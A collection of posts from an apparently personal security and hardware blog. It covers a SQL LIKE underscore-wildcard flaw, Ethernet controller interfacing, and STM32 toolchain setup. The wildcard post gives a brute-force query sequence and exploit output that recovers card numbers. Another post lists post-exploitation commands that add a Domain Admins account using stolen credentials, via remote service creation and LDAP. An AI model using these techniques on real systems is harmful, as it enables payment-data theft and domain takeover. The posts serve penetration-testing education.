Josh Stone, Blog

Josh’s projects and security nerdery

SQL Wildcard Quirks

I found a neat vulnerability the other day, and I thought I’d write about it here. It’s actually an issue I’ve found before, and known about for at least 10 years, but for some reason I can’t find much discussion about it on the Internet. Since in my reports I want to provide references to additional resources so a customer can research and best understand the recommendations I make, I was disappointed not to find a good writeup of the issues you can encounter when you don’t filter all SQL wildcards.

Specifically, this blog post is about the underscore (“_”). Almost everyone is familiar with the “%” wildcard, which represents any arbitrary sequence of characters in a “like” query. Slightly less well-known is the “_” wildcard, which represents a single character. For example, if we have a table in a database that has my name in it, we could search for something like this:


Even if you’re using parameterized queries, it may still be possible for a user to submit wildcards, and the results can be significant, depending on the particulars. OWASP discusses some query timing issues that can be an interesting DoS in OWASP-DS-001. That’s important if you care about availability; but there’s also a potential impact to confidentiality.

Say, for example, that your application stores and processes credit card numbers. You have carefully ensured that when card data is displayed, it is always shown masked, so that a user can’t harvest the numbers. It’ll usually look something like this:

Masked PANs

It might be necessary at times to be able to search for a credit card number. But that’s OK, because if someone’s going to search for it, then they already know the number, right? As long as we don’t let someone search for partial numbers, then we shouldn’t have any issues. Consider a code snippet something like this:

get '/search/card/:pan' do
  if params[:pan].length == 16
    rows = $db.execute("select * from cards where pan like ?", [params[:pan]])
    content = list_customers(rows)
    $header + content + $footer
    $header + "<h2>ERROR: must search for full card number!</h2>" + $footer

In here we check to make sure that the user has submitted a full 16 digit number, and we aren’t using “%” wildcards around our like query, so this should only return the rows where the card number matches. In case you’re not a Ruby afficianado, here’s the query (the “?” gets replaced with the submitted value):


This is where underscores become suddenly important. For example, suppose the credit card number is 4111111111111111. We can search for something like this, and it will still return the correct result:


This is enough to extract all of the card numbers from the database, with enough queries. We can search for a card number that consists of all “_” characters except one digit. With successive queries, we can determine the value of each digit in the number. Here’s an example:

SELECT * FROM CARDS WHERE PAN LIKE "0_______________" -> 0 rows
SELECT * FROM CARDS WHERE PAN LIKE "1_______________" -> 0 rows
SELECT * FROM CARDS WHERE PAN LIKE "2_______________" -> 0 rows
SELECT * FROM CARDS WHERE PAN LIKE "3_______________" -> 0 rows
SELECT * FROM CARDS WHERE PAN LIKE "4_______________" -> 1 row
SELECT * FROM CARDS WHERE PAN LIKE "40______________" -> 0 rows
SELECT * FROM CARDS WHERE PAN LIKE "41______________" -> 1 row
SELECT * FROM CARDS WHERE PAN LIKE "410_____________" -> 0 rows
. . .

And so on. By submitting “_” characters, we satisfy the requirements of the SQL query, and can evaluate the responses to brute-force the entire credit card number. For all 16 digits, this happens in an average of 80 requests. If this is a web application, this happens in a matter of seconds.

For kicks, I put together a sample application that is vulnerable in this way (the code snippet from above comes from this example). It can be a fun exercise to write an exploit that mines all the card data from the application. You can get the sample application here, and an example exploit script here. Here’s an example run:

:) josh@atlantis-desktop $ ruby exploit.rb http://localhost:4567/ admin admin 4013

 CDE Buster - Brute Force PANs with '_' Wildcards - Josh Stone (C) 2015

  [-] Brute forcing PANs with prefix '4013'
  [+] 4013066436049272 -> 000001,Mary,Walker,4013********9272
  [+] 4013095262568113 -> 000016,Robert,Lopez,4013********8113
  [+] 4013142736227502 -> 000010,Thomas,Harris,4013********7502
  . . .
  [+] 4013973448854765 -> 000024,Richard,Thomas,4013********4765
  [+] 4013988348405260 -> 000011,Margaret,Robinson,4013********5260
  [+] 4013994852743575 -> 000022,Robert,Hall,4013********3575
  [-] Enumerated 25 PANs in 1830 requests

:) josh@atlantis-desktop $ 

The solution is better input filtering. Since these are credit card numbers, there should be a filter that ensures that all the characters are numeric. Minimally, you could just intentionally remove or escape “_” characters or throw an error message if they appear in the input.

Ethernet Parallel I/O

This is a post in a series about my Ethernet Project

In my last post, I talked a little about the Ethernet interface options in the hobby microcontroller world. Most of the time, these chips will use an SPI interface, which simplifies connectivity to the processor. SPI uses only a handful of lines to communicate serially, and can operate at pretty high speeds in many cases. In the Arduino world, SPI is usually limited to some fraction of the processor speed. It may also be further limited by the maximum specifications for the chip. So, for example, the ENC424J600, which I’ve selected, has an SPI mode that maxes out at 14MHz. This is a tad slow – some chips support more like 20-30MHz, but still, this is far slower than Ethernet line speed.

If I want to go full speed, I need to find something else. That’s one of the neat things about the ENC424J600 – it features a parallel I/O interface (PIO), which allows for much faster throughput than the SPI. There are several different schemes for using the PIO, and they range from ~80 megabits per second to 160 (only achievable with the bigger-brother ENC624, BTW). If I can get anywhere near 80 megabits, I’ll be pretty happy, considering that I’m talking about a small device that should end up costing something like $10-12.

Parallel I/O increases speed by multiplying the number of data lines. You can double the bit rate of your serial interface by doubling the clock frequency, but to do so with PIO, you just double the number of lines. In its most basic mode, the ENC424 supports an 8-bit bus, with up to 14 bits used for addressing. This means that on every read you get a full byte. Based on the timing specifications in the data sheet, this allows for near-80-megabit speeds, which is pretty nice in a $3 chip.

Even that paragraph above is a little simplified. There are 10 PIO modes documented (only 2 of which apply on the 44-pin ENC424), and then there are several addressing options that make it even more flexible (which also means more complicated). You choose which mode you’re going to use by tying some of the ENC424’s pins to low or high. E.g., I’m using PIO mode 5, so I tie the SPISEL pin to low (this enables PIO), and then tie the PSPCFG0 pin to low (indicating mode 5, and not 6). So what does it really look like to interface with this chip?

You can imagine that the ENC424 is a big memory chip. It possesses about 24 kilobytes of memory total, and most of it can be used for whatever you want. You could even use it just for its memory if you wanted to be silly! But some memory locations are special, defining registers that control the configuration and behavior of the chip. By reading and writing values from these special registers, we can configure all of our ethernet options, determine when packets have arrived, and instruct the chip to send a packet when we want to. And, with this memory model, the packet data just lives in in the rest of memory, so we have one common, consistent interface to the chip.

To use the PIO interface, we have to consider several things. First, there’s the physical connectivity. We need the 8 data lines, of course, that make up the bus. But there are also a number of control signals. Their function depends on which PIO mode we choose to use. All of my testing has been around using PIO mode 5. This uses read, write, and address latching signals in addition to the chip select signal. Here’s a diagram from the data sheet showing how they are supposed to work for a read operation:

Timing Diagram

Here’s a basic description for each signal:

  1. AL – this is the address latching signal. When it pulses high, the ENC424 will read a memory address from the data bus, which will influence what it does next. So, if you want to access the ECON1H register (the high byte of the first ethernet control register), you would configure the address 0x7e1f on the bus. This is obviously more than one byte, which is why there are actually 14 lines on the bus.
  2. RD – this is the read signal, causing the chip to configure the data lines as an output (relative to the ENC424), containing the values stored in the memory location that was last latched with an “AL” pulse. There are also some fancy auto-incrementing features (which I’ll get into in a later post) that allow you to do multiple reads with only one latch, and walk through memory.
  3. WR – similar to RD, this signal instructs the ENC424 to read data from the bus to write to the latched memory address. If you want to update the contents of memory, you set the address with AL, then put the data you want to write on the bus, then pulse this line.
  4. CS – this is the chip select line, which tells the chip that it should start watching the data lines for instructions. This is very handy if you have more than one chip on your bus – be they more ENC424s or something else with a parallel bus interface. You can actually get away with just tying this to a logic high and never changing it if the ENC424 is the only chip on the bus. But once I get to making inline devices that have multiple interfaces, this will be an invaluable feature.

Here’s a nearly useless picture of what it looks like. I’ll probably go into the PCB design for the breakout in a future blog post.


Based on the timing diagram above, here’s a very simple function for the Teensy 3.1 that reads a byte from the ENC424. Note that this is not exactly the code I end up using in my projects, because there’s this thing called the “indirect” addressing mode that saves all those extra address pins. But I’ll get into that later. Here’s how to read from chip memory:

unsigned short ENC424::read_addr(unsigned short addr) {
  unsigned short ret = 0;

  GPIOC_PDDR = 0xff;                   // Set port C as output
  GPIOC_PDOR = addr & 0xff;            // Send low byte of address to port C
  GPIOD_PDOR = (addr & 0xff00) >> 8;   // Send high byte of address to port D
  digitalWriteFast(ENC_CS, HIGH);      // Raise chip select to activate chip
  digitalWriteFast(ENC_AL, HIGH);      // Raise AL to signal address is ready
  digitalWriteFast(ENC_AL, LOW);       // Drop AL to lock memory address
  digitalWriteFast(ENC_RD, HIGH);      // Raise RD to instruct ENC424 to fetch
  GPIOC_PDDR = 0;                      // Set port C as input for reading from the bus
  nop; nop; nop; nop; nop;
  ret = GPIOC_PDIR;                    // Read response from the bus
  digitalWriteFast(ENC_RD, LOW);       // Drop RD to complete read instruction
  digitalWriteFast(ENC_CS, LOW);       // Drop CS to complete operation

  return ret;

This function above assumes that the data bus is populated on the port C pins (15, 22, 23, 9, 10, 13, 11, 12, on the Teensy 3.1), and that the additional 7 address pins are connected to the port D pins (15, 22, 23, 9, 10, 13, 11, 12, on the Teensy 3.1). The string of “nop” calls there cause the processor to do nothing for five clocks. This gives the ENC424 time to fetch the data from memory and write it out to the bus. The data sheet specifies this delay to be at least 75 nanoseconds (Tpsp2), which comes out to 5.4 clock cycles on the Teensy 3.1. The GPIOC_PDDR = 0 line above the nops takes at least one more cycle, so this makes sure we give the ENC424 enough time.

With that as basic groundwork, here’s an example of reading the register page from the ENC424 (these are all the memory addresses that start with 0x7exx). We use code something like this:

    void ENC424::printRegisters() {
      int i;
      Serial.printf("\nReading register map starting at 0x7e00\n");
      for(i = 0x7e00; i <= 0x7eff; i++) {
        if(i % 16 == 0) Serial.printf("\n%04x: ", i);
        byte val = read_addr(i);
        Serial.printf("%02x ", val);

Reading register map starting at 0x7e00

7e00: 00 00 00 00 00 10 fe 19 00 10 00 00 00 00 00 00 
7e10: 00 00 00 00 00 00 34 12 ff 5f 00 da 00 0f 01 00 
7e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
7e30: 00 00 00 00 af 00 34 12 ff 5f 00 da 00 0f 01 00 
7e40: 0d 80 b2 40 12 00 12 0c 0f 37 00 dc 00 10 00 00 
7e50: 20 00 00 00 00 01 34 12 ff 5f 00 da 00 0f 01 00 
7e60: 35 05 39 11 d8 80 00 00 00 00 00 00 00 10 02 eb 
7e70: 0f 10 10 88 21 26 34 12 ff 5f 00 da 00 0f 01 00 
7e80: 63 ca 63 ca 63 ca 02 06 00 00 02 06 50 01 02 06 
7e90: 00 00 00 00 34 80 05 35 11 39 80 d8 00 00 21 20 
7ea0: 80 04 08 49 00 00 00 00 00 00 00 00 00 00 00 00 
7eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
7ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
7ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
7ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
7ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

Of course, all of those values have meanings, which I’ll get into in a future blog post. And that demonstrates successful communication with the chip!

Ethernet Hardware Project

I’ve had a little dream for many years about getting my hands on Ethernet at the lowest possible level. Alright, maybe not quite as low as some – I don’t need to hit the physical layer quite like project Daisho. But I want to have nothing between myself and the packets on the wire. In some ways, perhaps this is a foolish project, since we really can do what we want with packets using tools like Scapy, which I’ve used to effect in my DHCP-exhaustion and 802.1x projects in the past. But even so, here are a couple reasons for this project:

  • Sometimes operating systems still get in the way (even Linux!)
  • Pure knowledge
  • Throw-away devices
  • Making absolute guarantees

That last one is probably the most compelling. For example, suppose you’re hacking a network with a very aggressive port security. Have you ever had your port killed because something leaked a packet with a bad MAC address? It could have been forgetting that a VM was configured with a bridged interface when you un-suspend it, or maybe you misconfigured something in a tool like Yersinia.

Or consider when you have a network with DAI enabled with ARP rate limiting. Everything’s going fine until you accidentally run a metasploit module that includes more than 10 boxes in your subnet, and then your port is borked for five minutes. What if you could guarantee that your box literally cannot send more than 9 ARP packets per second?

Throw-away devices are also another interesting one. I can’t rationally sacrifice something the cost of a BeagleBone Black on a fire-and-forget physical attack. Granted, that’s not usually in my rules of engagement… but what is research for, anyway? If I can make a throw-away ethernet device for $10, that gets into discretionary territory, for sure. Think of malicious sensors planted in different subnets, etc.

But really, it’s probably the second one that drives me on this project more than anything else. In all areas, I want to be able to confidently say I understand the full stack of technologies that drive the networks I need to assess. You really can’t think creatively about what attacks might be available unless you truly understand how everything works. Maybe some really useful, practical applications will emerge as I play with this project. Maybe not. In any case, I’ll probably be a smarter guy by the time I’m done with it.

I’m going to use this post to keep track of the various blog posts about this project – check back for new ones as they emerge!

Ethernet Hardware Options

This is a post in a series about my Ethernet Project

So I want to play hands-on with Ethernet. I thought it would be worth pointing out some of the hardware choices I’ve made for this project, especially considering the other ways that people do small-scale ethernet. I’m targeting something that’s about Arduino complexity, so that ecosystem is a good place to start.

There are a bunch of ethernet boards out there. For example, there’s the classic Ethernet Shield. This will run about $10-20 or so, and will pair well with any standard Arduino. In my case, though, this isn’t really a good option for several reasons. First, it’s based on a highly integrated solution, the Wiznet 5100, which takes the whole TCP/IP stack over for you, and provides a serial “sockets-like” interface. While very cool for doing Internet of Things projects with your Arduino, it’s not so good for what I’m aiming for. I think there might be some raw packet options, but by the time you factor in the SPI interface and everything, it’s just not the ideal solution.

There are some breakout boards based on the Microchip ENC28J60 chip, which is a nice SPI-based combination MAC and PHY. These work well, but are somewhat limited in speed – the SPI interface is capped at 20MHz, which means you can’t get more than 20mbps out of it. That isn’t such a big deal, but there’s another very nice option…

There’s the ENC28J60’s bigger brother, the ENC424J600, which has a snazzy parallel interface. The timings for the ENC424 allow a microcontroller to approach a full 80 megabits per second, which is pretty close to what anyone will practically see on a real network. If I want to build a man-in-the-middle inline device or something, this should be about ideal.

Another key consideration is the processor. I can’t do this with an 8-bit AVR, such as is used in most Arduinos, because they don’t have enough memory. If you have only 3KB of RAM, you’re not going to be able to store many packets in memory! The ARM Cortex microcontrollers, however, usually have many kilobytes of RAM and run at nice, fast speeds (like 100MHz+). That gives me the horsepower I need to implement a TCP/IP stack, keep packets in memory, and make decisions about what to do with those packets in real-time!

Create Domain Accounts Variously

I find myself creating Active Directory accounts fairly often. But of course I’m never doing it as a genuine domain administrator. That means I might not have MMC available to me – or maybe not even an RDP session! This blog post is about summarizing a few ways I’ve found handy in various situations.

All of these methods assume that I have somehow obtained a domain administrator account, so this isn’t “exploitation” so much as “post exploitation”. In this case, I’m going to be adding an account named eve to the domain EMPIRE via the domain controller palpatine. There are certainly other methods (e.g., WMI, though I’ve never been driven to use it to create a user thus far; or PSEXEC, which I use all the time, but isn’t all that exciting), so this is not exhaustive.

The Samba net Command, Part I

Samba includes a net command that’s very similar to the traditional Microsoft utility of the same name. It’s more powerful in many ways, though. If the domain is configured “normally”, then the net command should work just fine. It goes something like this:

# net -U EMPIRE\\administrator%Password1 -S palpatine rpc user add eve Password1
Added user 'eve'.
# net -U EMPIRE\\administrator%Password1 -S palpatine rpc group addmem "Domain Admins" eve

The Samba net Command, Part II

I’ve had at least one occasion where this did not work. I had compromised a protected network by obtaining a domain admin credential and finding a host that could communicate exclusively with the domain controller on port 445/TCP. While handy, I found that the above commands didn’t work. Later, I found that the administrators had hardened the domain controller in some unusual ways, one of which crippled a number of RPC calls required to accomplish the above. Not to be undone, I found another way using some net functionality that still worked for me:

# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service create PWN PWN \
    "cmd /c start /b cmd /c net user /domain /add eve Password1"
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service start PWN
Query status request failed.  [WERR_SERVICE_REQUEST_TIMEOUT]
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service delete PWN
Successfully deleted Service: PWN

Then add the user to the Domain Admins group:

# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service create PWN PWN \
    "cmd /c start /b cmd /c net group /domain /add \"Domain Admins\" eve"
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service start PWN
Query status request failed.  [WERR_SERVICE_REQUEST_TIMEOUT]
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service delete PWN
Successfully deleted Service: PWN

Manually via LDAP

Occasionally, I will find a scenario where I don’t have access to useful ports like SMB (445/TCP), but I might have access to LDAP. In this case, you can still create a domain admin, but it’s a little tricky. There are some howtos that you can staple together from the Internet to get there, but here’s the quick way:

  1. Make sure you have ldap-utils installed
  2. Create a local ldaprc file that disables certificate checking
  3. Create an LDIF file that describes the new user:
    1. First, create the user as a disabled account and no password
    2. Set the password with a Base64-encoded UNICODE-16 value
    3. Enable the account
    4. Add the account to the “Domain Admins” group
  4. Use ldapmodify (or one of its friends) to run the LDIF file

I have written a handy script for this, which makes it look something like this:

# ruby ldapcreate.rb palpatine EMPIRE administrator DC=empire,DC=local eve Password1

-=-=-= LDAP Admin Creator =-=-=-
by Josh Stone (

Enter LDAP Password: 
adding new entry "CN=eve,CN=Users,DC=empire,DC=local"

modifying entry "CN=eve,CN=Users,DC=empire,DC=local"

modifying entry "CN=eve,CN=Users,DC=empire,DC=local"

modifying entry "CN=Domain Admins,CN=Users,DC=empire,DC=local"

GCC Toolchain for Mbed on STM32F411RE Nucleo

This blog post is what I wanted to find on the Internet when I bought my new Nucleo STM32F411RE microcontroller board. I am absolutely pumped about working with this board. I have done some experimentation with the ARM Cortex microcontrollers (primarily with a Teensy USB 3.1), but I have some projects that require me to step it up and enter this world a little more thoroughly.

The Nucleo is a fantastic board – 100mHz ARM Cortex M4 (with FPU), half a megabyte of flash, all I/O ports exposed, and for only $10.33 at Mouser! After playing with it enough to get the hang of it, I am convinced that this is a really powerful platform, and under-appreciated for what it is.


You can’t talk about the Nucleo boards without mentioning the mbed environment. This is a cloud-based IDE/compiler environment where various ARM Cortex manufacturers provide “back-end” drivers for their chips and everything get’s abstracted nicely with a very high-level API. At first, I was worried that this was on the level of the Arduino training wheels, but the more I play with it, the more powerful I realize it is.

There are some blogs that suggest that Real Men™ code to the bare metal and eschew even STM’s hardware abstraction layer. But this is really premature optimization. If you have any familiarity with the Arduino software environment, the MBED API will seem similar enough. But there’s actually a lot more power here, since all of the hardware platforms conform to a higher level of basic functionality than the MCUs used on the Arduinos.

But… there’s a drawback. MBED is cloud-based, and the platform has drawn criticism, perhaps rightly so, for originally forcing developers to use the Internet-access-only environment. Well, times have changed somewhat, and you can use the MBED SDK offline. For me, since I do lots of coding while traveling, this is a necessary feature since I don’t always have access to the Internet. Plus, I don’t necessarily like the idea of my code being controlled by someone else (until I publish it, of course!).

But therein is another hurdle. Most of the environments you’ll see for offline MBED development are not so open-source and GNU/Linux friendly. Some are outright expensive. Almost all of them are Windows-only. And a few are free trials, which never sits well with me. I want Emacs, a compiler, and a Makefile. That’s what this blog is about – how to get your MBED code into a position where you can program your way and get things done in Linux.

Compilers and Libraries

You’ll need a couple things to compile code for the ARM Cortex CPU and support the software library expectations of the MBED SDK. These include an ARM embedded ABI (EABI) cross-compiler and the newlib base library. In Ubuntu 14.04, this worked well for me:

josh@ubuntu:~$ sudo apt-get install gcc-arm-none-eabi libnewlib-arm-none-eabi
josh@ubuntu:~$ sudo apt-get install g++-4.8-multilib

But there’s one more hurdle. If you’re an LTS user like me (got burned on those .10 releases long ago!), you’ll find that there’s a quirk in the current packages for 14.04. Some header files will be missing. This can be fixed a few ways, but I found the quickest way was to install the libstdc++-arm-none-eabi-newlib package manually (it’s not in the repositories). I’m not going to say this is the best way to do it, but it worked for me:

josh@ubuntu:~$ wget
josh@ubuntu:~$ sudo dpkg -i libstdc++-arm-none-eabi-newlib_4.8.3-11ubuntu1+4_all.deb 


We also need something that can access the JTAG / SWD functionality on the Nucleo board. This is best done with OpenOCD. There is a package in the Ubuntu repository for this, but it doesn’t come with definitions for all the Nucleo boards. This is the kind of software you want to compile yourself anyway to stay up to date, though, so I installed it from the Github repository. Here’s how it went for me.

Install some prerequisites:

josh@ubuntu:~/nucleo/openocd$ sudo apt-get install libtool
josh@ubuntu:~/nucleo/openocd$ sudo apt-get install automake
josh@ubuntu:~/nucleo/openocd$ sudo apt-get install libusb-1.0.0-dev

Download the Github repository:

josh@ubuntu:~/nucleo$ git clone
Cloning into 'openocd'...
remote: Counting objects: 49390, done.
remote: Total 49390 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (49390/49390), 13.56 MiB | 1.46 MiB/s, done.
Resolving deltas: 100% (40608/40608), done.
Checking connectivity... done.

Bootstrap the compilation process:

josh@ubuntu:~/nucleo$ cd openocd
josh@ubuntu:~/nucleo/openocd$ ./bootstrap
+ aclocal
+ libtoolize --automake --copy
+ autoconf
+ autoheader
+ automake --gnu --add-missing --copy installing './compile' installing './config.guess' installing './config.sub' installing './install-sh' installing './missing' warning: wildcard $(srcdir: non-POSIX variable name
. . .

Run configure. I include some more output here because you want to make sure that you have lots of “yes” autoconfigurations. If you didn’t install the right libusb-1.0.0-dev package or something else is missing, you may not be able to connect to devices. Make sure this looks something like what’s below:

josh@ubuntu:~/nucleo/openocd$ ./configure
checking for makeinfo... no
configure: WARNING: Info documentation will not be built.
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /bin/mkdir -p
checking for gawk... gawk
checking whether make sets $(MAKE)... yes
checking whether make supports nested variables... yes
. . .
jim-config.h is unchanged
jimautoconf.h is unchanged
Created Makefile from
Created build-jim-ext from

OpenOCD configuration summary
MPSSE mode of FTDI based devices        yes (auto)
ST-Link JTAG Programmer                 yes (auto)
TI ICDI JTAG Programmer                 yes (auto)
Keil ULINK JTAG Programmer              yes (auto)
Altera USB-Blaster II Compatible        yes (auto)
Versaloon-Link JTAG Programmer          yes (auto)
Segger J-Link JTAG Programmer           yes (auto)
OSBDM (JTAG only) Programmer            yes (auto)
eStick/opendous JTAG Programmer         yes (auto)
Andes JTAG Programmer                   yes (auto)
USBProg JTAG Programmer                 no
Raisonance RLink JTAG Programmer        no
Olimex ARM-JTAG-EW Programmer           no
CMSIS-DAP Compliant Debugger            no


Now make and install the package:

josh@ubuntu:~/nucleo/openocd$ make && sudo make install
. . .
make  install-data-hook
make[3]: Entering directory `/home/josh/nucleo/openocd'
for i in $(find ./tcl -name '*.cfg' -o -name '*.tcl' -o -name '*.txt' | sed -e 's,^./tcl,,'); do \
        j="/usr/local/share/openocd/scripts/$i" && \
        mkdir -p "$(dirname $j)" && \
        /usr/bin/install -c -m 644 ./tcl/$i $j; \
make[3]: Leaving directory `/home/josh/nucleo/openocd'
make[2]: Leaving directory `/home/josh/nucleo/openocd'
make[1]: Leaving directory `/home/josh/nucleo/openocd'


I don’t know if this is necessary, but stlink is another tool you can use to communicate directly with STM’s st-link interfaces. Start by downloading the repository from Github:

josh@ubuntu:~/nucleo$ git clone 
Cloning into 'stlink'...
remote: Counting objects: 4364, done.
remote: Total 4364 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (4364/4364), 13.31 MiB | 2.09 MiB/s, done.
Resolving deltas: 100% (2704/2704), done.
Checking connectivity... done.

Generate the configure script, compile, and install it:

josh@ubuntu:~/nucleo/stlink$ ./
josh@ubuntu:~/nucleo/stlink$ ./configure
josh@ubuntu:~/nucleo/stlink$ make && sudo make install

Here’s why stlink might be a good idea to have installed. It comes with some UDEV rules that will make sure that Linux does the right thing when you plug the USB port in:

josh@ubuntu:~/nucleo/stlink$ sudo cp 49-stlinkv2-1.rules /etc/udev/rules.d/
josh@ubuntu:~/nucleo/stlink$ sudo service udev restart
udev stop/waiting
udev start/running, process 4291

MBED Code Export

Now we have what we need to compile code. What we need next is some code to compile! The MBED web site really is very cool. There are a number of basic programs you can start with and manipulate. At any time you can compile the code and download a binary to write to the flash on your microcontroller. But what we’re interested in is the export feature. This will let us get a fully-functional MBED environment that we can use for offline development.

I’ll assume that you can create an account on the MBED web site – it’s just a username and password like anywhere else. Once you have the account, make sure you add your hardware platform to your profile. This is important because the MBED SDK is a front-end API that has to have hardware-specific drivers on the back end to make it work with your hardware. It’s chip-specific, so make sure you choose the right one. Navigate to the “Platform” section, search for the device you have (I’m using an STM32F411RE), and make sure it’s added to your profile like below:

Now, enter the “Compiler” part of the site and create a new program (“New” -> “New Program”). Make sure your hardware platform is selected, and choose something simple like the “Blink LED” program. Selecting it should look something like this:

Now export the code to a file. The MBED supports lots of different targets, but the one we’re interested in is the GCC ARM environment. These screenshots should help you get to the right spot:

I’m sure everyone knows how to unzip the file, but for completeness, here’s how I got it unpacked:

josh@ubuntu:~$ mkdir nucleo
josh@ubuntu:~$ cd nucleo
josh@ubuntu:~/nucleo$ unzip ~/Downloads/ Archive:  /home/josh/Downloads/
  inflating: Nucleo_blink_led/mbed.bld  
  inflating: Nucleo_blink_led/main.cpp  
  inflating: Nucleo_blink_led/.hgignore  
  inflating: Nucleo_blink_led/Makefile  
  inflating: Nucleo_blink_led/mbed/analogout_api.h  
  . . .

Fix the Makefile

This step may vary for different Linux distributions and releases. I found that on Ubuntu 14.04 there were a few issues with include directories, etc. There may be cleaner ways to make this work, but I found that adding the right flags in the Makefile made everything compile. If you don’t do this, then make will give you errors, and you’ll have to figure out what to do.

Open the Makefile in an editor and look for the line where INCLUDE_PATHS is defined. Add two more -I... flags to the end of it so that it looks probably something like this (note, don’t include the backslashes and newlines; I just want this to fit on the screen):

-I/usr/include/newlib/c++/4.8 -I/usr/include/newlib/c++/4.8/arm-none-eabi/

There is also a --specs flag that needs to be changed. Find the definition of LD_FLAGS and make it look something like this:

LD_FLAGS = $(CPU) -Wl,--gc-sections --specs=nosys.specs -u _printf_float -u _scanf_float

Compile your Program

Now it should compile with a straightforward make. If not, then look back above and make sure you did everything to this point. It’s also possible that you have other unique system configurations that get in the way, so look closely at the error messages. I include the full output here so you have as much information as possible:

josh@ubuntu:~/nucleo/Nucleo_blink_led$ make
make: Warning: File `main.cpp' has modification time 2.8e+04 s in the future
arm-none-eabi-g++ -mcpu=cortex-m4 -mthumb -mfpu=fpv4-sp-d16 -mfloat-abi=softfp -c -g -fno-common -fmessage-length=0 -Wall -fno-exceptions -ffunction-sections -fdata-sections -fomit-frame-pointer -MMD -MP -DNDEBUG -Os -DTARGET_NUCLEO_F411RE -DTARGET_M4 -DTARGET_CORTEX_M -DTARGET_STM -DTARGET_STM32F4 -DTARGET_STM32F411RE -DTOOLCHAIN_GCC_ARM -DTOOLCHAIN_GCC -D__CORTEX_M4 -DARM_MATH_CM4 -D__FPU_PRESENT=1 -DMBED_BUILD_TIMESTAMP=1417383839.53 -D__MBED__=1 -DTARGET_FF_ARDUINO -DTARGET_FF_MORPHO  -std=gnu++98 -fno-rtti -I. -I./mbed -I./mbed/TARGET_NUCLEO_F411RE -I./mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM -I./mbed/TARGET_NUCLEO_F411RE/TARGET_STM -I./mbed/TARGET_NUCLEO_F411RE/TARGET_STM/TARGET_NUCLEO_F411RE -I/usr/include/newlib/c++/4.8 -I/usr/include/newlib/c++/4.8/arm-none-eabi -o main.o main.cpp
arm-none-eabi-gcc -mcpu=cortex-m4 -mthumb -mfpu=fpv4-sp-d16 -mfloat-abi=softfp -Wl,--gc-sections --specs=nosys.specs -u _printf_float -u _scanf_float -Wl,,--cref -T./mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/NUCLEO_F411RE.ld -L./mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM  -o Nucleo_blink_led.elf main.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_cryp.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_tim_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_ll_fmc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_rcc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_smartcard.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_pwr_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_ll_fsmc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_rng.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_eth.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/cmsis_nvic.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_dma_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_ll_sdmmc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_hcd.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/hal_tick.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_pccard.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_dac_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_irda.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_sd.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_sai.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_i2s_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_sram.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_spi.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_adc_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_gpio.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_flash.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_pcd_ex.o 